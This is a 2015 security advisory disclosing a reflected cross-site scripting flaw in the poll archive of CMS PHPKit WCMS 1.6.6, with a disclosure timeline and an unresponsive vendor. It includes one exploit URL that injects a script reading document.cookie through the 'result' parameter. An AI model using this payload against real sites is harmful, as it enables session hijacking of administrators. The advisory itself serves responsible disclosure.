CMS PHPKit WCMS 1.6.6 Cross Site Scripting

2015-01-13T00:00:00
ID PACKETSTORM:129917
Type packetstorm
Reporter Steffen Roesemann
Modified 2015-01-13T00:00:00

Description

                                        
                                            `Advisory: Reflecting XSS vulnerability in CMS PHPKit WCMS v. 1.6.6  
Advisory ID: SROEADV-2014-07  
Author: Steffen Rösemann  
Affected Software: CMS PHPKit WCMS v. 1.6.6 [Build: 1660014]  
Vendor URL: http://www.phpkit.com/de/  
Vendor Status: did not respond to issue  
CVE-ID: -  
  
==========================  
Vulnerability Description:  
==========================  
  
The poll archive in the administrative backend of CMS PHPKit WCMS v. 1.6.6  
is prone to reflecting XSS attacks.  
  
  
==================  
Technical Details:  
==================  
  
The poll archive is located in the following URL in a common PHPKit WCMS  
installation:  
  
http://{TARGET}/upload_files/pk/include.php?path=pollarchive&result=1  
  
By appending arbitrary HTML- and/or JavaScriptcode to the parameter  
"result", it gets rendered and reflects back on the webpage.  
  
Exploit-Example:  
  
http://  
{TARGET}/upload_files/pk/include.php?path=pollarchive&result=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E%3C!--  
  
=========  
Solution:  
=========  
  
Vendor did neither respond to issue nor published a solution for this  
vulnerability.  
  
  
====================  
Disclosure Timeline:  
====================  
29-Dec-2014 – found the vulnerability  
29-Dec-2014 - informed the developers  
29-Dec-2014 – release date of this security advisory [without technical  
details]  
12-Jan-2015 - release date of this security advisory  
12-Jan-2015 - send to lists  
  
  
  
========  
Credits:  
========  
  
Vulnerability found and advisory written by Steffen Rösemann.  
  
===========  
References:  
===========  
  
[1] http://www.phpkit.com/de/  
[2] http://sroesemann.blogspot.de/2014/12/sroeadv-2014-07.html  
[3]  
http://sroesemann.blogspot.de/2015/01/report-for-advisory-sroeadv-2014-07.html  
  
  
`